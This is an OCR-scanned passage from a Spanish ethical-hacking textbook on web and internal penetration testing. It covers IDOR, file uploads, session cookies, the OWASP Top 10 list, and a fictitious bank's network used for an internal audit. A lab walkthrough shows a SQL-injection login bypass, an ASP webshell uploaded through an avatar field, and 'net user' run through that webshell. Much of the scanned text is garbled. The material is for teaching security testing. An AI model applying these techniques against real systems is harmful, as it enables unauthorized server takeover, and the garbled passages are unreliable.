to  undefined  function  ...  in  <rutafisica>'\  acaba  de  detectar  un  full  path  disclosure.  En  la  imagen 
se  puede  visualizar  un  ejemplo  real  y  la  obtencion  de  la  ruta  interna. 

Fatal  error:  Cali  to  undefined  function  xap_links()  in  .■'home^^^^^H(Ppublic_hrml  'template,php  on  line  452 

Fig.  3.22:  Deteccibn  full pcuh  disclosure. 

Las  aplicaciones  deben  disponer  de  un  controlador  de  en'ores  que  gestionen  estos  fallos  que  pueden 
SLM*  provocados  en  las  aplicaciones.  Es  importante  apottar  la  menor  informacion  hacia  el  usuario 
linal.  En  los  servidores  IfS  se  dispone  del  modo  debug  cuando  las  peliciones  se  rcalizan  desdc  una 
red  interna,  y  el  modo  normal  para  cuando  las  peticiones  se  realizan  desde  el  exterior.  En  este  ultimo 
caso,  en  caso  de  haber  un  error  en  la  aplicacion  se  aporta  la  menor  informacion  posible,  mientras  que 
en  el  primer  caso  al  administrador  o  el  usuario  interno  que  haya  obtenido  este  error  se  le  proporciona 
el  mayor  delalle  sobre  el  fallo. 

Tambien  es  cieito  que  el  modo  debug  de  US  puede  ser  encontrado  habilitado  publicamente.  lo  cual 
es  una  muy  mala  poHtica,  ya  que  al  general*  un  error  en  la  aplicacion  se  obtiene  el  mayor  detalle. 


Acceso  no  autorizado 

En  el  Topi  0  de  OWASP  2013  esta  vulnerabilidad  se  encuentra  en  el  puesto  niimero  4.  y  es  cnunciada 
en  dicho  top  como  ''Referenda  Directa  Insegura  a  Objetos*’.  ^,En  que  consiste?  Un  sitio  web  dispone 
de  objetos  dentro  del  sistema  y  son  referenciados  a  traves  de  parametros,  si  el  auditor  cambia  este 
valor  por  otro  para  referenciar  directamente  a  otro  objeto,  el  sistema  deberia  verificar  que  se  tiene 
acceso,  pero  i/y  si  no  lo  hace?  El  auditor  puede  acceder  a  informacion  y  otras  funcionalidades  para 
las  que  no  tiene  acceso. 

El  sistema  siempre  debe  comprobar  que  todo  objeto  al  que  referenda  un  usuario  a  trave.s  de  un 
parametro  puede  ser  accedido  por  dicho  usuario,  en  caso  contrario  se  puede  caer  en  este  fallo  dc 
seguridad. 

/.Como  se  puede  comprobar  esta  vulnerabilidad?  Realmente  es  sencillo,  se  propone  un  escenario 
donde  en  funcion  del  rol  del  usuario  se  tiene  acceso  a  cieitas  funciones  u  objetos  o  a  otras.  Se 
deben  verificar  todas  las  referendas  a  objetos  y  que  estas  tienen  los  mecanismos  de  validacion 
adccuadas  para  poder  confinnar  el  acceso.  En  otras  palabras,  la  aplicacion  debe  verificar  si  el  usuario 
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esta  autorizado  para  acceder  al  recurso  y  realizar  un  analisis  de  codigo  de  la  aplicacion  para  poder 
implemerrtacion  es  cotrecta  y  cumple  con  las  medidas  de  segundad  aprop.adas 

en  este  caso. 

La  utilizacion  de  herramientas  automaticas  en  este  ejemplo  es  complejo  ya  que  no  suelen  tener 
^esul  ardemasiado^  buenos.  Por  esto,  una  vez  analizado  el  codigo  y  observando  en  que  pun  o 
"puln  errores  de  es.e  tipo,  se  pueden  ™lie.r  e  ma„o  las  connprobacones  sobre  las 

referencias  a  objetos  directos. 

Subida  de  ficheros 

Sin  duda  la  subida  de  ficheros  por  parte  de  un  atacante  es  uno  de  los  mayores  riesgos  ^e^"  ^ 
□re  existen  ya  que  estos  ficherL  subidos  pueden  proporcionarle  el  control  total  del  serv.dor  o  p  rt 
de  el.  Existen  diferentes  mecanismos  para  que  un  atacante  sea  capaz  de 
ya  se  ha  explicado  en  este  llbro,  y  es  el  de  la  utilizacion  de  metodos  inseguros  como  PV  . 

:  Cual  es  el  objeti  vo  en  una  auditorla?  Realniente  si  un  ,,entester  consigue  subir  una  shell  o  webshell, 
«b  b^  tomara  el  control  del  servudor,  por  lo  que  toda  la  informac.on  que  este  almacene 
^drcomp^nietida,  por  ejemplo  obteniendo  los  usuarios  de  la  base  de  datos  de  la  aphcacon. 

Otras  acciones  que  pueden  interesar  es  demostrar  que  se  puede  escanear  la  red  intei-na.  la  ejecucion 
de  comandos  convirtir  el  servidor  en  un  nodo  para  pivotar  hacia  otros  equipos  de  la  red  interna  o 
s’e  encuentre,  o  convertirlo  en  un  servidor  de  SPAM.  Realniente  el  nuniero  de  acetones 
que  se  pueden  llevar  a  cabo  en  este  punto  son,  practicamente,  ilimitadas. 

Otra  de  las  vlas  para  subir  ficheros  a  un  servidor  son  las  propias  caracteristicas  de  ciertas  aplicaciones 
1“  Z  “rmi.™  ssbi,  pns  o  aigbn  fichbro  con  a, gun  “ 

deben  ser  analizados  de  fonna  exhaustiva.  ya  que  pueden  realizar  un  mal  filtiado  y  peimitii  su 
«ro  p<  d  li  bams  ,uc  no  son  los  ,uc  la  aplicacion  cspc.  Un  error  en  este  pumo,  como  se  paed 
es  criLl  Z  la  segnrid.d  de  la  aplicacion.  del  servidor  y,  seg.ramenre,  de  la  prop,. 

empresa. 

[^^■..“prtbfdrrrpf"  P-enra  on  en.orno  senclllo,  peso  one  -dena  divers, 
vlerlbilidades.  El  escenario  es  acadmico,  pe,-„  rotalmenre  real,  y  s.  ha  podido  enconrra,  en 

diversas  auditon'as. 

La  aplicacion  web  vulnerable  es  un  portal  de  una  autoescuela  ficticia  en  la  que  los  ^'suarios  se 
resistran  y  tieiien  un  espacio  donde  pueden  configurar  sus  datos,  fotografias  e  interac  uar 
Sos  E^este  espacio  virtual  de  encuentro  tambien  pueden  realizar  test  para  coniproba.  su 

preparacion  de  cara  al  examen. 

La  aplicacion  web  consr.  de  on  pnnro  de  entrada  qne  es  la  pantalla  de  login,  un 

,1  on  recorso  pan.  el  "OMde  conrroseno"  y  on  ul.inro  recurso  con  .nlormacon  de 
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autoescuela,  este  ultimo  con  contenido  estatico.  Estos  son  los  recursos  superficiales  de  la  aplicacion 
web.  La  tecnologia  utilizada  por  la  aplicacion  web  ASP. 

Una  de  las  pruebas  obligadas  en  las  pantallas  de  login  es  comprobar  que  no  se  pueden  realizar 
inyecciones  de  algun  tipo.  Otra  de  las  recomendaciones  que  se  ban  ido  haciendo  a  lo  largo  del  libro, 
es  que  se  deben  realizar  las  acciones  mas  sencillas  para  ir  pasando  a  acciones  mas  complejas,  pero 
siempre  comprobando  todo.  En  muchas  ocasiones  se  cae  en  el  en'or  de  no  comprobar  algo  porque 
es  algo  demasiado  obvio  y  no  va  a  funcionar,  pero  en  muchas  ocasiones  el  fallo  de  seguridad  puede 
salir  a  la  luz  con  una  accion  sencilla. 

El  auditor  comprueba  manualmente  o  utilizando  algiin  tipo  de  herramienta  si  existe  algiina  inyeccion 
SQL  en  el  login.  La  primera  inyeccion  a  comprobar  podria  ser  catalogada  como  'orl  —7.  ^Esto 
sigue  funcionando?  Hoy  en  dia,  y  aunque  parezea  increible,  todavia  existen  sitios  que  son  vulnerables 
a  esto.  Resumiendo,  el  auditor  compmeba  manualmente  su  primera  inyeccion  e  introduce  como 
LiSLiario  admin  o  la  propia  inyeccion  y  como  password \'d  inyeccion. 

Tras  esto,  el  auditor  nota  que  accede  a  un  panel  de  zona  interna.  Con  esta  simple  inyeccion  ha 
consegLiido  lograr  el  acceso,  esto  cs  una  vulnerabilidad  grave  que  no  debe  ocuiTir  hoy  en  dia,  pero 
como  se  ha  mencionado  todavia  se  pueden  encontrar  donde  menos  sc  espera. 

Tras  visualizar  los  campos  y  que  funcioncs  existen  en  la  aplicacion  se  podrian  probar  muchas  mas 
cosas  dentro  de  la  zona  interna,  pero  centrandose  en  la  subida  dc  una  webshell  y  aprovechando  que 
existe  un  campo  de  carga  de  imagenes  para  la  cuenta  en  la  que  se  ha  consegiiido  acceso.  el  penicster 
decide  comprobar  la  seguridad  de  dicho  campo. 


Adjiinlar  foto  o  avatar; 

Selecaonar  arciiivo  '  .-‘V  "a  avlvicicor-rj  rfcn  -o 

•*.:tjaiiiar  dales 


Fig.  3.23:  Subida  de  uiia  webshell. 

La  webshell  que  se  intente  subir  debe  ser  para  ASP^  ya  que  aqiii  impoita  la  tecnologia.  Algunas 
^yehshells  muy  conocidas  para  PHP  son  la  C99  o  b374k.  En  este  caso  no  se  pueden  utilizar  estas,  ya 
quo  la  tecnologia  qsASP.  La  dispone  de  los  privilegios  que  disponga  cl  usuario  bajo  el  que 


108 


Ethical  Hacking:  Teoria  y  praclica  para  la  realizacidn  de  unpenlestwg 


se  ejecuta  la  aplicacion  web,  por  lo  que  aqui  tambien  se  puede  aprovechar  de  una  mala  configuracion 
por  parte  del  administrador. 


Tras  la  subida  de  la  M^ebshell  el  usuario  puede  comprobar  que  no  se  filtran  los  ficheros,  por  lo  que 
2  puede  s2  cualquier  tipo  de  fichero  y  la  aplicaeion  web  dispone  de  un  nuevo  recurso  donde 
iterian  las  Lgenes,  e„  caso  son  d  nombra  da  la  .■etsl.ell.  por  lo  qoe  pa„ 

acceder  a  ella  siniplemente  se  debe  ejecmar  dicha  direccidn  _ 


Execute  Command  » 

CmdPath: - - - - - 1 


lc:\winntvsystem32*-cfnd  eye 


Afgument 


/cnet  user 


J 


ASFIHT 

Invitadc 


Se  na  r-r,s::e'>^dc  el  cirrec^ar.er.^e. 


Fia.  3.24:  Ejecucion  dc  comandos  a  iravcs  dc  la  ^\'ebshell. 


En  este  instantc  el  seiwidor  esla  bajo  el  control  del  auditor  que  dispone  de  los  privilegios  que  tenga 
el  usuario  con  el  que  se  ejecuta  la  aplicacion  web  para  realizar  acciones. 


Ataques  a  los  puntos  de  entrada 

Cuando  se  encuentran  puntos  de  entrada  o  login  entij,  estos  deben  ser  anotados  para  su  posterior 
Lalisis  Estos  login  pasaran  por  diversas  pruebas,  incluidas  las  mas  famosas  de  inyeccion.  pe  o 
la  I'ueba  que  s^nri^e  debe  realizarse.  aunque  a  priori  pueda  resultar  demas.ado  senc.lla  o  con  un 
posible  resultado  negativo  en  la  priieba  es  la  fiierza  bruta  con  diccionaiio. 

El  diccionario  a  utilizar  es  variable  y  dependera  del  tiempo  para  paialelizai  taieas,  ^ 

poder  comprobar  los  resultados.  Hay  que  recordar  que 

solo  de  tipo  web.  en  este  apartado  se  tratarian  desde  servicios  SSH,  FTP,  MySQL,  S,  , 

Si  se  utiliza  un  diccionario  grande  se  tardara  un  mayor  tiempo  en  ejecutar  „ 

es  comprobar  si  el  usuario  y  eontrasena  podna  encontrarse  en  un  diccionaii  ,  y 

menos  seguro. 
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Como  ejemplo  sigiiificativo  se  qiiiere  mostrar  que  los  puntos  de  entrada  y  los  posiblcs  fallos  varian 
en  funcion  del  usuario  que  acceda  por  este  punto.  Es  decii;  no  sera  igual  las  posibilidad  de  encontrar 
baja  seguridad  en  un  punto  de  entrada  que  solo  utilizan  administradores  de  un  sitio,  que  un  punto  de 
entrada  que  utilizan  miles  de  usuarios. 

Ademas,  si  a  los  usuarios  se  les  pennite  configurar  cualquier  tipo  de  contrasenas,  sin  restricciones 
las  posibilidades  de  encontrar  una  eontrasena  debil  aumentan  en  gran  medida. 

Herramientas  como  Hydra  facilitan  la  ejecucion  de  esta  automatizacion.  El  propio  Burp  Suite  puede 
tambien  realizar  este  tipo  de  acciones.  Hay  heiTamientas  mas  especificas  como  son  BrutusAET  2 
para  utilizar  la  fuerza  bruta  con  servicios  FTP.  Realmente  el  auditor  debe  elegir  en  cada  instante  lo 
que  mejor  pueda  utilizar,  conociendo  la  eficiencia  de  la  heiTamienta  en  todo  momento  y  con  la  que 
se  sienta  comodo. 


Gestion  de  sesiones 

La  gestion  de  sesiones  puede  pasar  desapercibida  para  muchos  usuarios,  pero  es  un  punto  en  el  que 
e\  peutester  analizar  e  intentar  jugar  con  ello.  Se  pueden  enumerar  un  listado  de  pruebas  que  se 
debe  realizar  a  las  famosas  cookies  para  comprobar  que  las  sesiones  se  estan  realizando  de  manera 
segura. 


En  primer  lugar  hay  que  hablar  de  los,  ya  mencionados,./7c7^.v  secure  y  HTTP-only,  El  primero  de  ellos 
debe  ser  enviado  desde  el  servidor  al  cliente  cuando  este  inicia  sesion  mediante  el  protocolo  HTTPS. 
Esie  /Z^/g^  indica  al  navegador  que  solo  puede  realizar  navegac ion  cn  este  servidor  si  la  comunicacion 
va  cifrada.  En  caso  de  detectar  que  un  servidor  cuando  asigna  la  cookie  no  esta  enviando  el/Zc/g  y  la 
conexion  debe  ser  segura,  se  debe  apuntar  como  fallo  de  seguridad. 

Ln  segundo  lugar  ^\  Jhg  HTTP-only,  el  cual  ha  sido  trabajado  con  anterioridad.  Este/Za^^  evita  que 
cocligo  script  pueda  acceder  a  La  cookie,  solo  siendo  el  navegador  el  que  puede  hacerlo.  La  falta  de 
este  tipo  de  mccanismo  de  seguridad  haria  que  la  cookie  pudiera  quedar  expuesta,  de  manera  mas  o 
menos  sencilla. 

Otra  recomcndacion  o  circunstancia  a  comprobar  es  la  validez  de  una  sesion  desde  distintas 
clirccciones  IP.  Este  hecho  es  mas  comun  de  lo  que  se  puede  pensar  y  se  debe  valorar  en  su  Justa 
medida.  Si  el  enlomo  es  extremo  y  critico,  quiza  es  necesario  valorar  esta  accion  como  algo  necesario 
para  la  seguridad  de  la  organizacion.  En  otros  muchos  entornos  este  punto  no  es  relevante.  aunque 
siempre  debe  ser  valorado. 

Otra  prueba  que  hay  que  verificar  es  la  de  detenninar  los  limites  y  cierres  de  la  sesion.  Es  importante 
comprobar  que  el  servidor  haya  realizado  correctamente  esta  accion,  para  que  las  cookies  no  puedan 
ser  reutil izadas  en  otro  espacio  o  tiempo. 

Se  han  dado  escenarios  de  grandes  compahias  cuyo  webniail  no  cerraba  correctamente  la  sesion, 
por  lo  que  un  usuario  que  previamente  habia  robado  la  cookie  con  algun  metodo  podria  seguir 
navegando  dentro  de  la  sesion,  aunque  el  usuario  legitimo  cerrase  sesion. 


no 


Tea  A  y  praclc.  para  ,a  realizccio.  de  w,  pe,«es,i.J_ 


ir  o^  F\isten  cases  en  el  que  en  la  cookie  viaja  informacion  que 
v.„.,.ar  c.„a  iaEo™.ci.a  po.r,a  vi.M  c„  ana 

cookie,  esto  esta  basado  en  hechos  reales. 

-  PHPSESSJD. 

-  iiserjipo. 

-  idjmiario. 

-  userjiser. 

-  Id=(ldentificcici6n). 

-  user=(Usi{ario  en  texto  claw) 

-  pass^(Hash  de  la  conlrasena). 

El  campo  user  y  pass  no  deberlan  ir  en  la  cookie  parlicX'  de  la 

el  usuario  de  la  sesion.  Quien  loba  dicha  c  i  fnmiacion  aiie  es  enviada  en  la  cookie,  ya  que 
r  rr 'Srpr^l  ;'ovocar  „„  g™  «lo  -e  sagamdad  ,  axposicid. 

de  informacion. 

^oocionPQ  dificil  oara  ciertos  informaticos, 
Por  ultimo,  se  debe  tratar  un  aspecto  ,^^5.  cookies.  Algunos  de  los  parametros 

como  es  la  predictibilidad  en  la  geneiacion  r,„a<.jo„es  no  se  cumple.  por  lo  que  obteniendo 

deban  se,  to.alraen.c  aleawios.  y  «.o  en  I  |a  cootie. 

diversas  cookies  se  puede  encontrar  un  patron  po,  el  que  se  putdc  pi 


^eC?p!!t!'!nf!IL  d.  ,aa  «*enab;,a,a.a^ae  n..  ^n  .as  ae  »ca.n,,.. 
aparcciendo  en  el  top  y  que  se  deben  conocei. 

la  seauridad  en  general  de  una  aplicacion  web. 

H,  d'oen-o  odc;a,  de,  Top  ,0  de  O.W  ae  P-^-o^n  e_„  “I* 

lntps://wynv.awasp.or^^^  ;;ifirrndo  cateaorias  e  indieando  riesgos  y  soluciones 

presenta  un  componente  de  s^Sui'dad  ^p  j,  proporcionando  ejemplos  rapidos  a 

iiCSa:  aL-iormente  se  queda  en  la  supei^cie.  en  las 

vulnerabilidades  mas  encontradas  hoy  en  dia.  _ 

"i:t°t”d:eSrde!;:*e;:e:t^^ 
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de  aparicion  en  Internet  es  muy  grande  y,  por  siipuesto,  las  einpresas  conocedoras  de  esto,  quieren 
verificar  que  no  son  viibierables  a  estas.  Tambien  es  cierlo  que  el  mimdo  de  la  informatica  esta  en 
continuo  cambio,  por  lo  que  dichos  cambios  provocan  que  aparezean  nuevas  vulnerabilidades  que 
piieden  no  encontrarse  en  el  top,  al  menos  por  aliora, 

A  continuacion  se  proporciona  el  listado,  por  orden  de  aparicidn  en  Internet,  de  las  vulnerabilidades 
segun  el  (op  de  OWASP. 

1.  Inyeccion. 

2.  Perdida  de  autenticacion  y  gestidn  de  sesiones. 

3.  Secuencia  de  comandos  en  sitios  cruzados  (XSS). 

4.  Referencia  directa  insegura  a  objetos. 

5.  Configuracion  de  seguridad  incorrecta. 

6.  Exposicion  de  datos  sensibles. 

7.  Ausencia  de  control  de  acceso  a  las  funciones. 

8.  Falsificacion  de  peticiones  en  sitios  cruzados  (CSRF). 

9.  Uso  de  componentes  con  vulnerabilidades  conocidas. 

10.  Redirecciones  y  reenvios  no  validados. 

l:s  importantc  estar  informado  por  OWASP  o  SANS  para  conocer  nuevas  vulnerabilidades,  saber 
clasificarlas,  definir  el  impacto,  y  como  no  saber  explicarlas  posleriormente  al  cliente. 


3.Auditona  interna 

Las  aiiditorias  internas  proporcionan  un  estado  de  la  seguridad  de  los  distintos  segmenlos  de  red 
tie  la  L'lnpresa.  Estos  segmentos  de  red  son  ubicaciones  iiiiemas  las  cuales  no  disponen  dc  grandcs 
privilegios  de  conectividad  con  sistemas  que  contienen  informacion  sensible.  Diclio  de  otro  modo. 
uno  dc  los  posibles  roles  del  auditor  sera  el  de  un  empleado  cuyo  equipo  se  encuentra  en  uno  de 
dichos  segmentos  de  red,  con  el  fin  de  encontrar  las  vias  que  dispone  cstc  supucsto  empleado  para 
acceder  a  informacion  sensible  a  la  que  no  esta  autorizado. 

Olro  posible  rol  que  es  utilizado  en  este  tipo  de  auditorias  es  el  de  un  invitado  de  la  empresa  que 
sc  conecla  con  su  equipo  a  la  red  corporativa.  El  objetivo  es  el  mismo  que  el  del  rol  del  empleado. 
visualizar  o  sustraer  informacion  sensible. 

Fara  enlender  mejor  este  tipo  de  auditorias  se  debe  conocer  que  los  segmentos  de  red  suelen  .ser  de 
finanzas,  de  desan-ollo,  de  marketing,  y  con  puestos  informaticos  que  no  dispongan  de  privilegios. 
Gcncralmenle,  se  conoce  que  las  redes  se  encuentran  segmentadas  y  que  un  usuario  no  puede  acceder 
0  no  dispone  de  conectividad  con  cualquier  equipo  de  la  red.  Este  hecho  es  el  mas  comun  en  grandes 
corporaciones  y  einpresas  con  un  niinimo  detalle  de  seguridad  en  la  red  interna.  Esta  segmentacion 
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se  realiza  mediante  la  implemenlacion  de  VLAN,  la  cual  proporciona  una  solucion  dc  aislamiento 
interesante. 

Las  oruebas  que  se  detallaran  a  cominuacion  debetan  ser  lealizadas  y  documcntadas  en  fo™'®  ^ 
ii“io  Esi  forma  de  redac.ar  informa  a  la  empresa  que  eon.ra.a  el  serv.e.o  las  recnrcs  ,  objelos 
interesanles  encontrados  durante  las  distintas  joinadas. 


Pruebas  ,  , 

La  auditorla  interna  puede  tener  distintos  objetivos,  aunque  algunos  son  comunes  a  todas  las 
a^di.o,rL„..s.  Js  objedvos  no  comunes  vienen  dados  por  el  ripo  de  redes  y  srslemas  que 

compoiigan  la  red  interna  de  la  organizacion. 

Por  eiemplo  si  la  red  es  de  sisteinas  Miamoft  Windows  estara  compuesta  por  dominios,  los  cuales 
dispSn  de  uno  0  uarios  admmisl, adores  de  dominio,  po,  lo  que  consigurerrdo  dreh.  credenaab 
se  podra  acceder  a  toda  la  intbrmacidn  sensible  de  esle  tipo  de  sislemas.  Sr  la  red  a  dc  * ^ 
ms  “  etieos  pneden  carnbiar,  y  1.  via  pare  acceder  a  la  informacon  tambrern  En  esre  eapr.ulo  s 
pretende,  mediante  el  uso  de  ejeniplos,  explicar  en  detalle  como  deberan  trabajai  los  auditoies  en  cl 

nuindo  prolesional. 

Las  pruebas  que  gencralmenle  se  llevan  a  cabo  en  este  tipo  de  auditorias.  con  el  Rn  de  cncontrar  la 
via  de  acceso  a  la  intbrmacion  sensible,  son  las  cntimeradas  a  continuacion. 

-  Diseno,  analisis  de  la  lopologia  de  red  y  analisis  de  la  segmentacion.  Las  priineras 
pruebas.  una  vez  el  auditor  se  encuentra  en  el  segmenlo  a  auditar,  son  realizadas  pai  a  detectar 
la  visibilidad  con  las  maquinas  de  la  red.  El  conocimiento  del  entorno  es  impiescindib  e  para 
poder  ir  realizando  las  distintas  pruebas  sobre  las  maquinas  adyacentes  tenei 

de  sistemas  operativos,  versiones  dc  productos,  servicios  y  direcciones  IP  es  imprescmdible 
para  que  la  aiiditoria  interna  sea  un  exito. 

-  Analisis  de  seguridad  de  VLAN.  Comprobacion  de  qiie  las  VLAN  implementadas  en  las 
redes  de  la  organizacion  funcionan  con-ectamente.  Se  realizaran  pruebas  para  conipro  c 
que  no  se  pued^e  evadir  la  VLAN.  Existen  pruebas  con  las  que  se  puede  lenegociai  el  t  p 
Puerto  del  switch,  con  el  objetivo  de  obtener  un  tipo  irimk. 

.  Seguridad  de  los  puntos  de  acceso.  En  las  grandes  eorporaciones  existen  mecanismos 
que  no  pcrmiten  realizar  ataques  ARP  Spoofing,  enlre  otras  acciones.  por  lo  que  hay  qi 
verificar  que  estos  mecanismos  a  nivel  de  puerto  funcionan  correctamente.  Un  e^mplo  es 
Port  Securin’  el  cual  proporciona  un  mecamsmo  para  restnngii  una  dneccion  -  ‘ 

X„  delcrmirrudo,  y  err  Lo  dc  violacibn  se  ejecu.ara  urru  acci.ro  rcs.rrcrrva,  oo.rbcarrdo  .1 
administrador  la  accion  ocurrida  o  deshabilitando  el  pueiio. 

-  Sniffing  de  red  y  analisis  de  trafico  de  red.  Otra  de  las  pruebas  que  hay  que  llevar  a  ca  o 
es  eva/uar  el  trafico  que  es  visible  desde  el  punto  de  acceso  de  la  red  en  la  que  se  enc 

el  auditor.  Esta  accion  se  realiza  sin  llevar  a  cabo  mnguna  tecnica  pma  ^ 

Con  esta  accion  se  pretende  verificar  que  el  auditor  no  podra  recibir  tiafi  p 
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en  la  configuracion  de  la  red.  Puede  parecer  un  hecho  no  logico,  pero  existen  fallos  en  la 
configuracion  de  las  redes,  los  cuales  pueden  provocar  que  el  trafico  con  un  destino  concrete 
Ilegiie  al  equipo  del  auditor,  pudiendo  consultar  informacion,  credencialcs  o  cookies. 

-  Escalada  de  privilegios  en  la  red.  Esta  es  la  prueba  mas  importante  de  la  auditona  interna. 
Demostrar  la  posibilidad  de  ir  escalando  privilegios  es  algo  iniprescindible.  El  auditor 
necesitara  escalar  privilegios  para  que  otras  pruebas  den  un  resultado  positivo  en  la  auditona. 
El  desplazamiento  vertical  en  la  infraestructura  por  parte  del  auditor  viene  proporcionada  por 
una  escalada  de  privilegios. 

-  Obtencion  de  credenciales.  En  esta  prueba  se  comprobara  la  foitaleza  dc  los  hashes 
encontrados  y  las  vias  para  localizar  credenciales,  ya  sean  en  un  formato  de  hash  o  dc  texto 
piano.  Esta  prueba  pennite  al  auditor  realizar  desplazamiento  horizontal  sobre  la  organizacion, 
es  decir,  conseguir  acceso  a  otras  maquinas  donde  poder  realizar  mas  pruebas  en  biisca  de  los 
objetivos  marcados.  Hay  que  destacar  que  la  obtencion  de  una  credencial  de  mayor  privilegio 
proporciona  la  posibilidad  de  un  desplazamiento  vertical. 

-  Cifrado  de  comunicaciones.  En  este  tipo  de  pruebas  se  comprobara  que  la  informacion 
sensible  dentro  de  la  organizacion  circula  con-ectamente  cifrada.  Es  muy  comun  que  on  la 
Intranet  de  la  organizacion  los  protocolos  no  sean  seguros,  pero  puede  llegar  a  ser  critico  si 
la  intbrmacion  es  sensible  y  los  empleados  pueden  llegar  a  inlerceptarla. 

-  Analisis  global  de  la  informacion  obtenida.  Cada  vez  que  se  obtiene  un  objetivo  o  se 
realiza  una  prueba.  ya  sea  de  manera  satisfactoria  o  no,  se  debe  analizar  y  documentar  lo 
realizado.  Este  proceso  se  realiza  en  paralelo  al  conjunto  de  pruebas  y  se  corresponde  con  una 
prueba  mas.  Como  se  mcnciono  anteriormente,  se  documentara  a  modo  de  diario,  indicando 
que  pruebas  se  realizaron  al  dia  y  que  objetivos  se  lograron. 

Los  objetivos  de  estas  pruebas  se  deben  marcar  por  criticidad  en  funcion  de  la  informacion  sensible 
tjue  dichos  sistemas  de  la  red  puedan  gestionar  o  almacenar.  Algunos  de  los  objetivos  comunes  que 
sc  deben  ir  completando  en  este  tipo  de  auditoria  son  los  siguientes: 

-  Posibilidad  de  utilizar  tecnicas  pass  the  hash  eon  el  fin  de  impersonalizar  cualquier  tipo 
de  usuario  de  la  organizacion. 

-  Conectividad  con  eqtiipos  criticos,  con  los  que  a  priori  no  se  disponia  de  conectividad. 

Intrusion  en  maquinas  criticas  con  el  fin  de  obtener  informacion  sensible  o  posibiiidades 
de  disponer  de  acceso  a  otras  maqumas  de  la  organizacion.  En  este  capitulo  se  tratara  cl  tema 
del  desplazamiento  veitical  y  horizontal  en  las  auditorias. 

-  Informacion  sensible  en  sen'idores  o  maquinas  que  no  deberian  ser  almacenadas.  Existen 
maquinas  en  la  organizacion  que  pueden  almacenar  datos  que  se  encuentran  en  dichas 
maquinas  por  en'or.  Esta  infoiTnacion  sera  localizada  y  documentada  en  el  informe  final. 

‘  Obtencion  de  credenciales  de  administrador  local  de  una  m^quina. 

'  Obtencion  de  credenciales  de  administrador  de  dominio. 

Obtencion  de  credenciales  o  hashes  de  usuarios  de  dominio. 


114 


Ethical  Hacking:  Teona  y  practica  para  la  realtacion  de  m  pentesting 


Visualizacion  de  informacion  confidencial,  como  por  ejemplo,  dates  privados,  cuentas  de 
usu^l  S  de  clientes.  En  general,  informacion  que  pueda  danar  la  .magen  co.porat,va  de 
cumplir  con  la^egislacion  vigente  de  proteccion  de  dates  del  pats  en  cuest.on 

-  Modificacion  de  informacion  confidencial.  Demostrar  la  posib.lidad  de  que  un  potencial 
ataclte  puede  modificar  la  integridad  de  la  infonnacon  sensible  de  la  orgamzacton.  Po. 
ejemplo,  L  una  entidad  bancaria  se  podria  cambiar  numeros  de  una  cuenta  de  un  clientc. 


PoC-  Escenario  inicial  de  auditoria  interna 

En  las  nruebas  de  concepto  que  se  pueden  estudiar  en  este  apartado  sobre  auditoria  interna  se 
mooone  un  esce^^^^^^^  que  ftcilmente  seria  reproducible  en  la  realidad.  La  empresa  ded.cada  al 
LL  bancario -llhanks"  ha  contratado  los  servicios  de  su  empresa  para  llevar  a  cabo  la  auditoiia 
ll™  EuTque  los  audiloros  es  el  de  u„  empl.ado  del  depadamen.o  de  desarrollo. 

A  cominuacidn  se  detalla  el  escenario  intemo  de  la  empresa,  annque  por  facilidad  de  comprension  se 
«  mXoL  que  a  priori  el  audilor  no  conocera.  Por  ello  se  realiza.i  un  esquema  de  resunren 

en  el  que  se  muestra  que  cosas  conoce  el  auditor  a  pnoi  i  y  cuales  no. 

-  La  red  corporativa  dispone  de  un  dominio  con  dos  controladores  de  dommio. 

o  Controlador  de  dominio  DC/.dominio.intranet  con  direccion  IP  1 0.0.2. 1, 
o  Controlador  de  dominio  DC.Ldominio.intranet  con  direccion  IP  10.0.2.2. 
o  La  red  en  la  que  se  encuentran  los  controladores  de  dominio  es  la  red  10.0.2.0/8. 

.  Existe  un  segmento  de  red  correspondiente  al  area  de  desamollo,  en  el  cital  el  auditor 
coiTienzara  a  llevar  a  cabo  la  auditoria. 

o  Este  seemento  se  encuentra  en  la  red  1 0. 0. 0. 0/8. 

O  Existen^ervidores  de  pruebas  de  desarrollo  con  sistemas  operativos  Mcimq/i 
Window.^  Server  2000,  Microsoft  Windows  Server  2003  y  Microsoft  Windows 

Seiyer  2008. 

O  Existen  maquinas  con  sistemas  operatives  Windows  XPy  Windows  7. 
o  Existe  un  servidor  con  Zahbix,  el  ciial  es  un  sistema  de  monitoreo  de  redes 
disenado  para  registrar  el  estado  de  varios  servicios  de  red  seijidores  y  harxlwau. 
El  servidor  de  Zabbix  se  encuentra  en  la  direccion  IP  10.0.0.4. 

o  El  auditor  dispondra  de  un  equipo  en  la  direccion  IP  1 0.0.0. 1,  ^ 

equipo.  por  lo  que  dispondrS  de  privilegios  .dm,n,stmt,vos  oeales.  En  ca»  de 
ser  un  equipo  propio  de  la  organizacion,  seguramente  no  se  tuvieian  pi 
administrativos  locales  y  habria  que  adquinrlos. 

-  Existe  un  segmento  de  red  con'espondiente  al  area  de  finanzas  de  la  organizacion.  al  cua 
el  auditor  puede  no  tener  acceso  directo  a  ciertas  maquinas. 

0  Esle  segmento  se  encuentra  e„  la  red  lO.OM  A  priori,  se  puede  entende.q 
hay  conectividad  entre  la  maquina  del  audilor.  con  direccion  /F  .  ^  ^  . 
de  liuanaas.  pero  cuando  se  intenta  aeeeder,  no  se  dispone  de  eonecli.idad  c. 


Capitiilo  111.  Confeccionando  el  ataque 


todo  el  segmento,  pudiendo  acceder  a  ciertas  maquinas.  Existen  mecanismos  que 
evitan  el  acceso  entre  la  maquina  del  auditor  y  ciertas  maquinas  de  finanzas. 

o  Existen  servidores  de  pruebas  de  desarrollo  con  sistemas  operativos  Microsoft 
Windows  Server  2003,  Microsoft  Windows  Server  2008  y  Microsoft  Windows 
Server  2012. 

o  Existen  maquinas  con  sistemas  operativos  Windows  XPy  Windows  7. 

o  Existe  un  sei*vidor  con  la  aplicacion  Business  Objects,  la  cual  es  una  herramienta 
de  inteligencia  de  negocio  en  los  procesos  de  las  organ izaci ones.  La  direccion  IP 
donde  se  encuentra  este  servidor  es  10.0.1.4. 

-  Existe  un  segmento  de  red  que  se  coiTesponde  con  el  area  de  produccion.  Este  segmento 
dispone  de  maquinas  criticas  para  el  negocio  de  la  empresa,  por  ejemplo  puede  tener 
servidores  donde  se  almacenan  los  temas  economicos  de  los  clientes. 

o  Este  segmento  se  encuentra  en  la  red  10.0.10.0/8.  El  auditor  puede  disponer  de 
acceso  a  algunas  maquinas  de  produccion,  pero  no  seran  sistemas  importantes. 
